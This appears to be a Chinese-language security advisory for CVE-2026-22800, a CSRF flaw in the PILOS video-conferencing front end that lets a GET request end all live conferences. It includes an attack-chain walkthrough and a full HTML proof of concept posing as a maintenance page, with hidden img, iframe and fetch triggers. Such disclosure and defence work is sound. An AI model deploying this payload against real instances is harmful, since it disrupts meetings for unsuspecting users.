CVE-2026-22800 PILOS管理API端点CSRF漏洞导致视频会议意外终止

漏洞信息

漏洞编号

CVE-2026-22800

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

PILOS (Platform for Interactive Live-Online Seminars) - BigBlueButton前端

漏洞概述

PILOS是BigBlueButton的交互式在线研讨会前端平台，在4.10.0之前的版本中存在一处跨站请求伪造（CSRF）漏洞。该漏洞存在于管理API端点中，该端点负责终止服务器上所有活动的视频会议。问题根源在于执行破坏性操作的端点暴露在HTTP GET请求中，虽然端点实施了正确的授权检查且无法被跨站触发，但由于使用GET方法，允许通过同站点内容（如嵌入在应用内的资源）隐式调用此操作。攻击者可通过社会工程学手段，诱使已认证的管理员在应用内查看特制内容，从而在管理员不知情或未经明确确认的情况下触发端点，导致服务器上所有活动视频会议被意外终止。此漏洞对系统可用性造成影响，但不影响机密性和完整性。漏洞已于4.10.0版本中修复。

技术细节

漏洞根源在于PILOS应用的管理API端点违反了安全最佳实践，将破坏性操作（终止所有视频会议）暴露在HTTP GET请求方法中。正常情况下，GET请求应当仅用于获取数据，不应执行状态变更操作。攻击者可以利用以下方式触发漏洞：1）构造包含恶意链接或自动加载资源的HTML页面；2）将该页面嵌入到已认证管理员访问的同源应用中；3）当管理员访问该内容时，浏览器会自动携带有效的会话Cookie向目标端点发送GET请求；4）服务器端正确验证了用户权限（需要管理员权限），但无法区分请求是用户主动发起还是被诱导发起。由于授权检查通过，请求被执行，导致所有活动视频会议被终止。此攻击的利用条件相对苛刻，需要管理员主动访问攻击者构造的内容，但由于使用了GET方法，系统无法实施CSRF令牌等标准防护机制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标PILOS实例，确认版本低于4.10.0，并定位管理API端点路径（/api/v1/admin/conferences/terminate-all）

STEP 2

步骤2: 构造攻击载体

攻击者创建包含恶意内容的HTML页面，该页面包含向目标端点发送GET请求的代码（img标签、iframe或JavaScript fetch）

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、即时消息或其他方式诱导已认证的PILOS管理员访问构造的恶意页面

STEP 4

步骤4: 触发漏洞

当管理员访问恶意页面时，浏览器自动向目标端点发送GET请求，同时携带有效的管理员会话Cookie

STEP 5

步骤5: 端点执行

服务器端验证请求携带有效管理员权限后，执行终止所有活动视频会议的操作

STEP 6

步骤6: 攻击完成

所有正在进行的视频会议被意外终止，用户体验受影响，攻击者达成拒绝服务效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-22800 CSRF PoC - Terminate All Video Conferences -->
<!-- This PoC demonstrates the CSRF vulnerability in PILOS admin API -->
<!-- Attack requires: 1) Valid admin session, 2) Admin visits this page -->

<!DOCTYPE html>
<html>
<head>
    <title>Conference System Maintenance</title>
</head>
<body>
    <h1>System Maintenance Page</h1>
    <p>Loading conference resources...</p>
    
    <!-- Automatic GET request to terminate all conferences -->
    <!-- Replace TARGET_URL with actual PILOS instance URL -->
    <img src="https://TARGET_URL/api/v1/admin/conferences/terminate-all" 
         alt="Conference thumbnail" 
         style="display:none;" />
    
    <!-- Alternative: Auto-submit link (clickable) -->
    <a href="https://TARGET_URL/api/v1/admin/conferences/terminate-all" 
       style="display:none;">Conference Resources</a>
    
    <!-- Alternative: iframe-based trigger -->
    <iframe src="https://TARGET_URL/api/v1/admin/conferences/terminate-all" 
            style="display:none;"></iframe>
    
    <script>
        // Force immediate request on page load
        window.onload = function() {
            // Using fetch to trigger the vulnerable endpoint
            fetch('https://TARGET_URL/api/v1/admin/conferences/terminate-all', {
                method: 'GET',
                credentials: 'include'  // Include admin session cookie
            }).then(response => {
                console.log('Conference termination triggered');
            }).catch(err => {
                console.error('Request failed:', err);
            });
        };
    </script>
</body>
</html>

影响范围

PILOS < 4.10.0

防御指南

临时缓解措施

对于无法立即升级的情况，建议采取以下临时缓解措施：1）提醒管理员不要点击来源不明的链接，尤其是嵌入在邮件或消息中的链接；2）使用独立的浏览器配置文件或隐私浏览窗口进行PILOS管理操作；3）在Web应用防火墙（WAF）中添加规则，阻止对管理端点的非预期HTTP方法请求；4）监控和告警异常的会议终止事件；5）考虑临时禁用该功能或实施IP白名单访问控制。